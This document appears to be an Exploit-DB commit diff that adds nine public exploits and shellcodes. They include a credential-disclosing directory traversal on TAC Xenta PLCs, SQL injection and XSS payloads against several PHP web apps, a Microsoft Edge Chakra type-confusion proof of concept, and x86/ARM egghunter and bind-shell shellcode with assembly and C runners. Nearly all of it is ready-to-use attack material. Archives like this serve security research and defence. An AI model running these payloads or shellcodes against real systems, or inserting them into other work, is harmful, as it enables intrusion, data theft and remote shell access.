DB: 2018-06-01

9 changes to exploits/shellcodes

Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion
TAC Xenta 511/911 - Directory Traversal
New STAR 2.1 - SQL Injection / Cross-Site Scripting
PHP Dashboards NEW 5.5 - 'email' SQL Injection
CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting
Grid Pro Big Data 1.0 - SQL Injection

Linux/x86 - EggHunter + access() Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)
Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)
This commit is contained in:
Offensive Security 2018-06-01 05:01:45 +00:00
parent 89ee92def8
commit 0f18636d14
11 changed files with 646 additions and 0 deletions

View file

@ -0,0 +1,32 @@
# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
# Date: 25.05.2018
# Exploit Author: Marek Cybul
# Vendor Homepage:
https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
# Version: 5.17
# Schneider Electric TAC Xenta 911 and 511 PLCs
Directory traversal in help manuals allows for credentials extraction
Devices are not indexed by crawlers like Shodan or Censys due to
ancient SSL configuration,
needed to use old browser to support it (not even s_client, curl or
ncat could connect).
Example URI: /www/help/public/../../../sys/pswd
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
HTTP/1.0 200 OK
root
super user
/
/
/
password
0
900
3

View file

@ -0,0 +1,31 @@
# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
# Version: 2.1
# Category: Webapps
# Tested on: Kali Linux
# Description : 'ajax.php' working in the input field contains SQL
vulnerability. The search section also contains XSS vulnerability.
====================================================
# PoC : SQLi :
Parameter: name (GET)
Type: AND/OR time-based blind
Demo:
http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newstar=login&name=admin' AND SLEEP(5) AND
'ddni'='ddni&password=123456
====================================================
# PoC : XSS :
Payload(1) :
http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1

View file

@ -0,0 +1,44 @@
# Exploit Title: PHP Dashboards NEW v5.5 - 'Login' SQL Injection
# Dork: N/A
# Date: 31.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
====================================================
# PoC : SQLi :
POST /php/save/user.php?mode=lookup HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 52
Cookie: PHPSESSID=phcubu5ohtdjnd6g1bmsncro87
Connection: keep-alive
email=test%40test.com&password=test123&dashboardKey=
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: email=test@test.com' AND SLEEP(5) AND
'XnxG'='XnxG&password=test123&dashboardKey=
====================================================

View file

@ -0,0 +1,31 @@
# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The 'offset' and 'db' parameters in the database table
preview query has vulnerabilities.
====================================================
# PoC : SQLi :
Parameter: offset (GET)
Type: UNION query
Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10
Title: Generic UNION query (NULL) - 10 columns
Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--
STgb&limit=10
====================================================
# PoC : XSS :
Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10

View file

@ -0,0 +1,61 @@
# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The multiple parameters in the 'test.php' query contain
SQLi vulnerabilities.
====================================================
# PoC : SQLi :
POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive
page=1&on_home=5&table_name=be&params%5B0%5D%5Btype%5D=text&params%5B0%5D%5Bvalue%5D=&params%5B0%5D%5Bname%5D=Name&params%5B1%5D%5Btype%5D=text&params%5B1%5D%5Bvalue%5D=&params%5B1%5D%5Bname%5D=Surname&params%5B2%5D%5Btype%5D=num_range&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bname%5D=Age&params%5B3%5D%5Btype%5D=date&params%5B3%5D%5Bvalue%5D=&params%5B3%5D%5Bname%5D=Born_date&ordering=none
Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT
CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL--
LEgG&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND
1906=1906 AND
'%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND
SLEEP(5) AND
'%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
Parameter: params[0][name] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name)
AND SLEEP(5) AND
(2977=2977&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
====================================================

View file

@ -0,0 +1,59 @@
/*
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt(window, arr);
}
The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50) // w.event
000001a8`80001235 48ffd0 call rax
000001a8`80001238 488b8e30bdf0ff mov rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158 movsd xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418 movsd mmword ptr [r12+18h],xmm0 // arr[0] = 2.3023e-320;
...
As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.
PoC:
*/
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
function main() {
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow;
for (let i = 0; i < 100000; i++) {
opt(window, [1.1]);
}
let set_callback = new f.contentWindow.Function('callback', `
window.__lookupSetter__('event').call(parent, new Proxy({}, {
getPrototypeOf() {
callback();
return {};
}
}));`);
let arr = [1.1];
set_callback(() => {
arr[0] = {};
});
opt(window, arr);
alert(arr);
}
main();

View file

@ -5984,6 +5984,7 @@ id,file,description,date,author,type,platform,port
44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -39476,3 +39477,8 @@ id,file,description,date,author,type,platform,port
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,

Can't render this file because it is too large.

View file

@ -888,3 +888,6 @@ id,file,description,date,author,type,platform
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - EggHunter + access() Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm

1 id file description date author type platform
888 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
889 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86
890 44791 shellcodes/linux_x86/44791.c Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes) 2018-05-28 Luca shellcode linux_x86
891 44807 shellcodes/linux_x86/44807.c Linux/x86 - EggHunter + access() Shellcode (38 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
892 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
893 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm

97
shellcodes/arm/44811.c Normal file
View file

@ -0,0 +1,97 @@
/*
Linux/ARM (Raspberry Pi) - Egghunter + /bin/sh Shellcode (32 bytes)
------------------------------
// If your shellcode in higer address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-higher.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 // switch to thumb mode
bx r3
.code 16
adr r1, startpoint // set r1 to start point address
ldr r2, egg // set r2 to egg's value
next_addr:
add r1, r1, #1 // increment scan address
ldr r3, [r1] // set r3 to the value stored in r1's address
cmp r2, r3 // compare values
bne next_addr // if failed to find egg, jump to next address
mov r3, pc // switch to arm mode
bx r3
.code 32
mov pc, r1 // jump to found address
egg:
.ascii "\x50\x90\x50\x90"
startpoint:
pi@raspberrypi:~ $
------------------------------
// If your shellcode in lower address, use following egghunter.
pi@raspberrypi:~ $ cat egghunter-lower.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 // switch to thumb mode
bx r3
.code 16
adr r1, startpoint // set r1 to start point address
ldr r2, egg // set r2 to egg's value
next_addr:
sub r1, r1, #1 // increment scan address
ldr r3, [r1] // set r3 to the value stored in r1's address
cmp r2, r3 // compare values
bne next_addr // if failed to find egg, jump to next address
startpoint:
mov r3, pc // switch to arm mode
bx r3
.code 32
mov pc, r1 // jump to found address
egg:
.ascii "\x50\x90\x50\x90"
pi@raspberrypi:~ $
------------------------------
*/
#include <stdio.h>
#include <string.h>
// If your shellcode in higer address, use following egghunter.
unsigned char egghunter[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x05\xa1\x04\x4a\x01\x31\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";
unsigned char egg[] = \
"\x50\x90\x50\x90" // egg tag
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1" // execve('/bin/sh')
"\x49\x40\x52\x40\x01\xa0\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x41";
// If your shellcode in lower address, use following egghunter.
//unsigned char egghunter[] = \
//"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa1\x04\x4a\x01\x39\x0b\x68\x9a\x42\xfb\xd1\x7b\x46\x18\x47\x01\xf0\xa0\xe1\x50\x90\x50\x90";
void main()
{
printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
printf("Egg shellcode Length: %d\n", strlen(egg));
int (*ret)() = (int(*)())egghunter;
ret();
}

View file

@ -0,0 +1,129 @@
/*
; Filename: egghunter.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Blog post: https://codiceinsicuro.it/slae/
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: This is the first stage of our payload. An egg-hunter shellcode
; looping through memory and jumping on the payload after the
; second egg found in memory.
global _start
section .text
_start:
xor ecx, ecx
mul ecx
next_page:
or dx, 0xfff
next_addr:
; EDX is 4096 here, that is the value of PAGE_SIZE constant
inc edx
; EBX is our memory cursor
lea ebx, [edx+0x4]
xor eax, eax
; access is defined as #define __NR_acces 33 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
;
; system call prototype is:
; int access(const char *pathname, int mode);
mov al, 0x21
int 0x80
cmp al, 0xf2 ; 0xf2 is the opcode for EFAULT. If my register
; has this value, a signal for a invalid page
; access it has been received
jz next_page
mov eax, key
mov edi, edx
scasd
jnz next_addr
scasd
jnz next_addr
; At this point we are at the very beginning of our shellcode, after
; the second key. We can jump to it
jmp edi
section .data
key equ 0xdeadbeef
; Filename: execve.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Blog post: https://codiceinsicuro.it/slae/
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: This is the default payload for the egg hunter demo. It will
; execute "/bin/sh" using execve() system call.
global _start
dd 0xdeadbeef
dd 0xdeadbeef
section .text
_start:
xor eax, eax ; init EAX to 0
push eax ; pushing 0 to the stack to be used as NULL pointer
; execve is defined as #define __NR_execve 11 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
;
; system call prototype is:
; int execve(const char *filename, char *const argv[], char *const
envp[]);
push 0x68732f2f ; pushing //bin/sh into the stack
push 0x6e69622f ; the init double / is for alignment purpose
mov ebx, esp ; pointer to *filename
push eax ; pushing in the stack a pointer to NULL
mov edx, esp ; I don't care about environment here
push eax
mov ecx, esp ; I don't even care about passing arguments to
; my /bin/sh
mov al, 0xb ; execve = 11
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char egg_hunter[] = \
"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x31\xc0\xb0\x21\xcd\x80\x3c\xf2\x74\xed\xb8\xef\xbe\xad\xde\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";
unsigned char code[] = \
"\xef\xbe\xad\xde\xef\xbe\xad\xde\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", strlen(code));
printf("Egghunter Length: %d\n", strlen(egg_hunter));
int (*ret)() = (int(*)())egg_hunter;
ret();
}
--
$ cd /pub
$ more beer
I pirati della sicurezza applicativa: https://codiceinsicuro.it

View file

@ -0,0 +1,153 @@
/*
; Filename: tcp_bind_shellcode_light.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: binds on TCP port 4444 and spawn a shell on incoming
connections.
global _start
section .text
_start:
; Creating the socket.
;
; int socket(int domain, int type, int protocol);
;
; socket() is defined as #define __NR_socket 359 on
/usr/include/i386-linux-gnu/asm/unistd_32.h
; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h
; SOCK_STREAM is defined as 1 in
/usr/include/i386-linux-gnu/bits/socket_type.h
xor eax, eax
mov ebx, eax
mov ecx, eax
mov edx, eax
mov ax, 0x167 ; 359 in decimal
mov bl, 0x2
mov cl, 0x1
int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);
mov ebx, eax ; storing the socket descriptor into EBX for next syscall
;push eax ; save socket descriptor into the stack
; Binding the socket to 0.0.0.0 address at port 4444
;
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
;
;
; bind() is defined as #define __NR_bind 361 on
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor eax, eax
mov ax, 0x169 ; 361 in decimal
xor ecx, ecx
push ecx ; pushing 32 bit INADDR_ANY
push word 0x5c11 ; pushing PORT 4444 in network byte order
push word 0x2 ; pushing AF_INET as sin_family
mov ecx, esp ; now ECX points to the my_addr data structure
mov dl, 0x10 ; sizeof(my_addr) = 16 bytes
int 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));
; Listening on opened socket bound to port 4444
;
; int listen(int sockfd, int backlog);
;
; listen() is defined as #define __NR_listen 363 in
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor ecx, ecx
xor eax, eax
mov ax, 0x16b ; 363 in decimal
int 0x80 ; listen(sfd, 0);
; Accepting incoming connection on listening socket
;
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
;
; accept() is not defined as syscall in
/usr/include/i386-linux-gnu/asm/unistd_32.h.
; Instead accept4() is defined as #define __NR_accept4 364.
;
; From the man page, accept4() has the followint prototype:
; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int
flags);
;
; The last integer, as from the man page, if set to 0 makes the
; accept4() call to behave as the same as the accept()
xor eax, eax
mov ax, 0x16c ; 364 in decimal
push ecx ; ECX is 0, pushing on the stack
mov esi, ecx
mov ecx, esp ; ECX now points to a zero bytes region from the stack.
mov edx, esp
int 0x80 ; cfd = accept4(sfd, NULL, NULL, 0);
mov ebx, eax ; Saving socket descript resulting from accept4 into EBX
; Duplicating descriptor 0, 1, 2 to the socket opened by client
;
; int dup2(int oldfd, int newfd);
;
; dup2 is defined as #define __NR_dup2 63 in
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor ecx, ecx
mov cl, 2
xor eax, eax
dup2:
mov al, 0x3F ; 63 in decimal
int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0
dec ecx
jns dup2
; Executing shell
;
; int execve(const char *filename, char *const argv[], char *const envp[]);
; execve() is defined as #define __NR_execve 11 on
/usr/include/i386-linux-gnu/asm/unistd_32.h
xor eax, eax
push eax ; The NULL byte
push 0x68732f2f ; "sh//". The second '\' is used to align our command into
the stack
push 0x6e69622f ; "nib/"
mov ebx, esp ; EBX now points to "/bin//sh"
xor ecx, ecx
xor edx, edx
mov al, 0xB ; 11 in decimal
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x31\xc0\x66\xb8\x69\x01\x31\xc9\x51\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x31\xc9\x31\xc0\x66\xb8\x6b\x01\xcd\x80\x31\xc0\x66\xb8\x6c\x01\x51\x89\xce\x89\xe1\x89\xe2\xcd\x80\x89\xc3\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
--
$ cd /pub
$ more beer
I pirati della sicurezza applicativa: https://codiceinsicuro.it